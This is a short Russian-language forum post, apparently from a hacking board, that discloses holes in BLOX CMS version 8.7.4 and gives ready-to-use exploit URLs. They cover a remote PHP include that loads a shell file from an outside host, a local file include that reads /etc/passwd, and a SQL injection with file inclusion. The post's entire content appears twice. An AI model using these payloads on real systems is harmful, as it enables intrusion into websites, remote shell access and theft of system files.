[Dark Green]
10.01.2011, 21:40
Офф. сайт: Blox.ru (http://blox.ru) | Информация о CMS (http://www.cmslist.ru/catalogue/blox/)
Текущая версия: 8.7.4 настолько дырявая, что на раскрутку всех багов уйдет вечность Поэтому я ограничелся несколькими критическими уязвимостями =)
[PHP-Include REMOTE]
BLOX\functions\go.php[8]
register_globals=ON
Code:
http://blox/BLOX/go.php?dbhost=localhost&dbuser=root&dbpass=&dbname=blox&prefix=1&bloxDir=http://site.ru/shell.txt?
[PHP-Include LOCAL]
BLOX\functions\go.php[18], BLOX\functions\getPageParams.php[3]
register_globals=ON
Code:
http://blox/?cmsLanguage=russian/../../../../etc/passwd%00
POC [PHP-Include with SQL Injection]
BLOX\functions\go.php[29, 119-142]
Ошибка в синтаксисе SQL запроса в скрипте, пока косяк в коде не поправят - работать не будет.
Code:
http://blox/?PQ=1&1'UNION(SELECT(1),2,CONCAT('../../../../../../../../../../ect/passwd',0x00))/*
Скачать исходник: http://blox.ru/?download&file=BLOX.8.7.4.zip
Текущая версия: 8.7.4 настолько дырявая, что на раскрутку всех багов уйдет вечность Поэтому я ограничелся несколькими критическими уязвимостями =)
[PHP-Include REMOTE]
BLOX\functions\go.php[8]
register_globals=ON
Code:
http://blox/BLOX/go.php?dbhost=localhost&dbuser=root&dbpass=&dbname=blox&prefix=1&bloxDir=http://site.ru/shell.txt?
[PHP-Include LOCAL]
BLOX\functions\go.php[18], BLOX\functions\getPageParams.php[3]
register_globals=ON
Code:
http://blox/?cmsLanguage=russian/../../../../etc/passwd%00
POC [PHP-Include with SQL Injection]
BLOX\functions\go.php[29, 119-142]
Ошибка в синтаксисе SQL запроса в скрипте, пока косяк в коде не поправят - работать не будет.
Code:
http://blox/?PQ=1&1'UNION(SELECT(1),2,CONCAT('../../../../../../../../../../ect/passwd',0x00))/*
Скачать исходник: http://blox.ru/?download&file=BLOX.8.7.4.zip